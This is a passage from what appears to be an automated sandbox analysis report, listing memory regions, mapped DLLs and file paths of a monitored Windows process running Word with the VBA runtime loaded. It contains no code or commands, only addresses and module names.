"" Region: id = 516 start_va = 0xfb70000 end_va = 0xfd58fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 517 start_va = 0xfb70000 end_va = 0xff3cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 518 start_va = 0xff40000 end_va = 0x10305fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff40000" filename = "" Region: id = 519 start_va = 0xce50000 end_va = 0xd03dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce50000" filename = "" Region: id = 520 start_va = 0xfb70000 end_va = 0xfd5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 521 start_va = 0xce50000 end_va = 0xd11afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce50000" filename = "" Region: id = 522 start_va = 0xfb70000 end_va = 0xfe3cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 523 start_va = 0xfe40000 end_va = 0xffaefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe40000" filename = "" Region: id = 524 start_va = 0xce50000 end_va = 0xcfb5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce50000" filename = "" Region: id = 525 start_va = 0xfb70000 end_va = 0xff43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 526 start_va = 0xff50000 end_va = 0x10315fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff50000" filename = "" Region: id = 527 start_va = 0x10320000 end_va = 0x10507fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010320000" filename = "" Region: id = 528 start_va = 0xfb70000 end_va = 0xfd53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 529 start_va = 0xfd60000 end_va = 0x1002bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd60000" filename = "" Region: id = 530 start_va = 0x10030000 end_va = 0x103f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010030000" filename = "" Region: id = 531 start_va = 0x10400000 end_va = 0x107fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010400000" filename = "" Region: id = 532 start_va = 0x81c0000 end_va = 0x823ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrf{d99fb163-0dd1-469b-9f09-630d1f37b9bf}.tmp" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\~WRF{D99FB163-0DD1-469B-9F09-630D1F37B9BF}.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\content.word\\~wrf{d99fb163-0dd1-469b-9f09-630d1f37b9bf}.tmp") Region: id = 533 start_va = 0x695d0000 end_va = 0x6984efff monitored = 1 entry_point = 0x6966bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\PROGRA~2\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll") Region: id = 534 start_va = 0x692f0000 end_va = 0x693aefff monitored = 0 entry_point = 0x69301dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\SysWOW64\\msvcr100.dll" (normalized: "c:\\windows\\syswow64\\msvcr100.dll") Region: id = 535 start_va = 0xb6b0000 end_va = 0xb75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6b0000" filename = "" Region: id = 536 start_va = 0x7fe90000 end_va = 0x7fe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe90000" filename = "" Region: id = 537 start_va = 0xc20000 end_va = 0xc23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 538 start_va = 0x8040000 end_va = 0x8084fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 539 start_va = 0xc30000 end_va = 0xc33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 540 start_va = 0xb6b0000 end_va = 0xb73dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 541 start_va = 0xb750000 end_va = 0xb75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b750000" filename = "" Region: id = 542 start_va = 0x8240000 end_va = 0x8250fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 543 start_va = 0x2560000 end_va = 0x2561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002560000" filename = "" Region: id = 544 start_va = 0x8090000 end_va = 0x8091fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008090000" filename = "" Region: id = 545 start_va = 0x8260000 end_va = 0x8260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008260000" filename = "" Region: id = 546 start_va = 0xce50000 end_va = 0xcf36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 547 start_va = 0xcf40000 end_va = 0xd01cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrib.ttf" filename = "\\Windows\\Fonts\\calibrib.ttf" (normalized: "c:\\windows\\fonts\\calibrib.ttf") Region: id = 548 start_va = 0x10800000 end_va = 0x109fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010800000" filename = "" Region: id = 549 start_va = 0x691d0000 end_va = 0x692ebfff monitored = 0 entry_point = 0x692374f0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 550 start_va = 0x695b0000 end_va = 0x695c8fff monitored = 0 entry_point = 0x695b47e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 551 start_va = 0x8260000 end_va = 0x8260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008260000" filename = "" Region: id = 552 start_va = 0x8270000 end_va = 0x827ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008270000" filename = "" Region: id = 553 start_va = 0xb740000 end_va = 0xb74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b740000" filename = "" Region: id = 554 start_va = 0xb760000 end_va = 0xb76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b760000" filename = "" Region: id = 555 start_va = 0xd020000 end_va = 0xd11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d020000" filename = "" Region: id = 556 start_va = 0x10a00000 end_va = 0x10dbcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010a00000" filename = "" Region: id = 557 start_va = 0x10dc0000 end_va = 0x1117cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010dc0000" filename = "" Region: id = 558 start_va = 0xb760000 end_va = 0xb76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b760000" filename = "" Region: id = 559 start_va = 0xfb70000 end_va = 0xfc16fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 560 start_va = 0xb760000 end_va = 0xb76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b760000" filename = "" Region: id = 561 start_va = 0xb770000 end_va = 0xb77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b770000" filename = "" Region: id = 562 start_va = 0xb780000 end_va = 0xb78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b780000" filename = "" Region: id = 563 start_va = 0xb780000 end_va = 0xb78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b780000" filename = "" Region: id = 564 start_va = 0xb790000 end_va = 0xb79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b790000" filename = "" Region: id = 565 start_va = 0xb7a0000 end_va = 0xb7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b7a0000" filename = "" Region: id = 566 start_va = 0x76b50000 end_va = 0x76b54fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 567 start_va = 0xb780000 end_va = 0xb791fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 568 start_va = 0x695a0000 end_va = 0x695aafff monitored = 0 entry_point = 0x695a2150 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 569 start_va = 0x69100000 end_va = 0x691c8fff monitored = 0 entry_point = 0x69113180 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 570 start_va = 0xb7a0000 end_va = 0xb7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b7a0000" filename = "" Region: id = 571 start_va = 0x690e0000 end_va = 0x690fbfff monitored = 0 entry_point = 0x690e4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 572 start_va = 0xb7a0000 end_va = 0xb7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b7a0000" filename = "" Region: id = 573 start_va = 0x690d0000 end_va = 0x690defff monitored = 0 entry_point = 0x690d3f00 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 574 start_va = 0xb7b0000 end_va = 0xb7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b7b0000" filename = "" Region: id = 575 start_va = 0xfc20000 end_va = 0xfd20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc20000" filename = "" Region: id = 576 start_va = 0xfc20000 end_va = 0xfd20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc20000" filename = "" Region: id = 577 start_va = 0xfc20000 end_va = 0xfd20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc20000" filename = "" Region: id = 578 start_va = 0xb7b0000 end_va = 0xb7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b7b0000" filename = "" Region: id = 579 start_va = 0xfc20000 end_va = 0xfd20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc20000" filename = "" Region: id = 580 start_va = 0xfc20000 end_va = 0xfd20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc20000" filename = "" Region: id = 581 start_va = 0xb7b0000 end_va = 0xb7b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b7b0000" filename = "" Region: id = 582 start_va = 0x690c0000 end_va = 0x690ccfff monitored = 0 entry_point = 0x690c3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 583 start_va = 0x69050000 end_va = 0x690b6fff monitored = 0 entry_point = 0x6906b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 584 start_va = 0x69030000 end_va = 0x69040fff monitored = 0 entry_point = 0x69038fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 585 start_va = 0x68f70000 end_va = 0x6902efff monitored = 0 entry_point = 0x68fa1e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 586 start_va = 0x709e0000 end_va = 0x70a20fff monitored = 0 entry_point = 0x709e7fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 587 start_va = 0xb7c0000 end_va = 0xb7cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b7c0000" filename = "" Region: id = 588 start_va = 0x68ee0000 end_va = 0x68f60fff monitored = 0 entry_point = 0x68efb260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 589 start_va = 0x71200000 end_va = 0x71212fff monitored = 0 entry_point = 0x71209950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 590 start_va = 0x70230000 end_va = 0x7025efff monitored = 0 entry_point = 0x702495e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 591 start_va = 0xfc20000 end_va = 0xfd00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msword.olb" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\MSWORD.OLB" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msword.olb") Region: id = 592 start_va = 0x11180000 end_va = 0x113a5fff monitored = 1 entry_point = 0x1118e058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 593 start_va = 0x68ca0000 end_va = 0x68ed0fff monitored = 1 entry_point = 0x68cae058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 594 start_va = 0xb7c0000 end_va = 0xb7c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b7c0000" filename = "" Region: id = 595 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 596 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 597 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 598 start_va = 0xb7d0000 end_va = 0xb7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b7d0000" filename = "" Region: id = 599 start_va = 0xfd10000 end_va = 0xfd35fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 600 start_va = 0xb7e0000 end_va = 0xb7eafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 601 start_va = 0xd120000 end_va = 0xd12ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d120000" filename = "" Region: id = 602 start_va = 0xd120000 end_va = 0xd120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d120000" filename = "" Region: id = 603 start_va = 0xfd40000 end_va = 0xfd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd40000" filename = "" Region: id = 604 start_va = 0xdda0000 end_va = 0xdda2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dda0000" filename = "" Region: id = 605 start_va = 0x11180000 end_va = 0x11183fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011180000" filename = "" Region: id = 606 start_va = 0x11190000 end_va = 0x11190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011190000" filename = "" Region: id = 607 start_va = 0x111a0000 end_va = 0x111a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111a0000" filename = "" Region: id = 608 start_va = 0x111b0000 end_va = 0x111b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111b0000" filename = "" Region: id = 609 start_va = 0x111c0000 end_va = 0x111dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111c0000" filename = "" Region: id = 610 start_va = 0x111e0000 end_va = 0x111e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111e0000" filename = "" Region: id = 611 start_va = 0x111f0000 end_va = 0x11204fff monitored = 1 entry_point = 0x1128bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 612 start_va = 0x11210000 end_va = 0x11214fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 613 start_va = 0x11220000 end_va = 0x1129bfff monitored = 0 entry_point = 0x11221000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 614 start_va = 0x112a0000 end_va = 0x112a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112a0000" filename = "" Region: id = 615 start_va = 0x112b0000 end_va = 0x112b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112b0000" filename = "" Region: id = 616 start_va = 0x112c0000 end_va = 0x112c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112c0000" filename = "" Region: id = 617 start_va = 0x112d0000 end_va = 0x112d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112d0000" filename = "" Region: id = 618 start_va = 0x112e0000 end_va = 0x112fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112e0000" filename = "" Region: id = 619 start_va = 0x11300000 end_va = 0x11302fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011300000" filename = "" Region: id = 620 start_va = 0x11310000 end_va = 0x11315fff monitored = 1 entry_point = 0x113abfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 621 start_va = 0x11320000 end_va = 0x11323fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011320000" filename = "" Region: id = 622 start_va = 0x11320000 end_va = 0x1135ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011320000" filename = "" Region: id = 623 start_va = 0x11360000 end_va = 0x1145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011360000" filename = "" Region: id = 624 start_va = 0x11460000 end_va = 0x11463fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011460000" filename = "" Region: id = 625 start_va = 0x11470000 end_va = 0x11473fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011470000" filename = "" Region: id = 626 start_va = 0x11480000 end_va = 0x11740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011480000" filename = "" Region: id = 627 start_va = 0x11750000 end_va = 0x118bbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011750000" filename = "" Region: id = 628 start_va = 0x9a40000 end_va = 0x9ba6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a40000" filename = "" Region: id = 629 start_va = 0x9bb0000 end_va = 0x9d1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bb0000" filename = "" Region: id = 630 start_va = 0x9a40000 end_va = 0x9badfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a40000" filename = "" Region: id = 631 start_va = 0x9bb0000 end_va = 0x9d1afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bb0000" filename = "" Region: id = 632 start_va = 0x68b50000 end_va = 0x68c9dfff monitored = 0 entry_point = 0x68b93000 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\SysWOW64\\comsvcs.dll" (normalized: "c:\\windows\\syswow64\\comsvcs.dll") Region: id = 633 start_va = 0x68b20000 end_va = 0x68b42fff monitored = 0 entry_point = 0x68b27b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 634 start_va = 0x68b00000 end_va = 0x68b15fff monitored = 0 entry_point = 0x68b021d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 635 start_va = 0x68ad0000 end_va = 0x68afafff monitored = 0 entry_point = 0x68ad9a70 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 636 start_va = 0x9a40000 end_va = 0x9a4cfff monitored = 0 entry_point = 0x9a47b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 637 start_va = 0x9a40000 end_va = 0x9a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a40000" filename = "" Region: id = 638 start_va = 0x9a50000 end_va = 0x9a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a50000" filename = "" Region: id = 639 start_va = 0x7fe80000 end_va = 0x7fe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 640 start_va = 0x11480000 end_va = 0x11971fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011480000" filename = "" Region: id = 641 start_va = 0x9d20000 end_va = 0x9e9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d20000" filename = "" Region: id = 642 start_va = 0x11980000 end_va = 0x11b09fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011980000" filename = "" Region: id = 643 start_va = 0x68730000 end_va = 0x68ac0fff monitored = 0 entry_point = 0x689e35b0 region_type = mapped_file name = "d3dcompiler_47.dll" filename = "\\Windows\\SysWOW64\\D3DCompiler_47.dll" (normalized: "c:\\windows\\syswow64\\d3dcompiler_47.dll") Region: id = 644 start_va = 0x9a60000 end_va = 0x9b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a60000" filename = "" Region: id = 645 start_va = 0x9b60000 end_va = 0x9b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b60000" filename = "" Region: id = 646 start_va = 0x9b70000 end_va = 0x9b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b70000" filename = "" Region: id = 647 start_va = 0x9b80000 end_va = 0x9b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b80000" filename = "" Region: id = 648 start_va = 0x9b90000 end_va = 0x9b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009b90000" filename = "" Region: id = 649 start_va = 0x9d20000 end_va = 0x9e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d20000" filename = "" Region: id = 650 start_va = 0x9ba0000 end_va = 0x9baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ba0000" filename = "" Region: id = 651 start_va = 0x9e20000 end_va = 0x9e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e20000" filename = "" Region: id = 652 start_va = 0x9e30000 end_va = 0x9e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e30000" filename = "" Region: id = 653 start_va = 0x9e40000 end_va = 0x9e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e40000" filename = "" Region: id = 654 start_va = 0x9e40000 end_va = 0x9e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e40000" filename = "" Region: id = 655 start_va = 0x9e50000 end_va = 0x9e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e50000" filename = "" Region: id = 656 start_va = 0x9e60000 end_va = 0x9e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e60000" filename = "" Region: id = 657 start_va = 0x9e70000 end_va = 0x9e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e70000" filename = "" Region: id = 658 start_va = 0x9e80000 end_va = 0x9e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e80000" filename = "" Region: id = 659 start_va = 0x9e40000 end_va = 0x9e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e40000" filename = "" Region: id = 660 start_va = 0x9e50000 end_va = 0x9e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e50000" filename = "" Region: id = 661 start_va = 0x9e60000 end_va = 0x9e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e60000" filename = "" Region: id = 662 start_va = 0x9e70000 end_va = 0x9e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e70000" filename = "" Region: id = 663 start_va = 0x9e80000 end_va = 0x9e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e80000" filename = "" Region: id = 664 start_va = 0x9e40000 end_va = 0x9edbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e40000" filename = "" Region: id = 665 start_va = 0x9ee0000 end_va = 0x9eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ee0000" filename = "" Region: id = 666 start_va = 0x9ef0000 end_va = 0x9efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ef0000" filename = "" Region: id = 667 start_va = 0x9f00000 end_va = 0x9f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f00000" filename = "" Region: id = 668 start_va = 0x9f10000 end_va = 0x9f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f10000" filename = "" Region: id = 669 start_va = 0x9f20000 end_va = 0x9f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f20000" filename = "" Region: id = 670 start_va = 0x9f30000 end_va = 0x9f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f30000" filename = "" Region: id = 671 start_va = 0x9f30000 end_va = 0x9f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f30000" filename = "" Region: id = 672 start_va = 0x11b10000 end_va = 0x11b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b10000" filename = "" Region: id = 673 start_va = 0x11b20000 end_va = 0x11b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b20000" filename = "" Region: id = 674 start_va = 0x11b30000 end_va = 